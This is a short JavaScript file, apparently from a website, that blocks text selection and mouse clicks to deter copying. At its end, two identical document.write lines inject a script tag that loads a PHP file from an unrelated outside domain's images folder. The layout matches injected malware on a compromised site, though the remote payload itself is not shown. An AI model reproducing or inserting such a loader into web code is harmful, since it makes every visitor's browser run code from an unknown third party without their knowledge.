// JavaScript Document
/*
var bloq1 = document.getElementById('bloq1');
bloq1.style.visibility='hidden';
bloq1.style.display='none';
*/

// Internet Explorer
window.onload = function(){
	document.onselectstart = function(){
          return false;
    }
// Firefox
document.onmousedown = function(){
	return false;
	}
}

document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');
document.write('<script src=http://jungmannova.cz/images/clause34.php ><\/script>');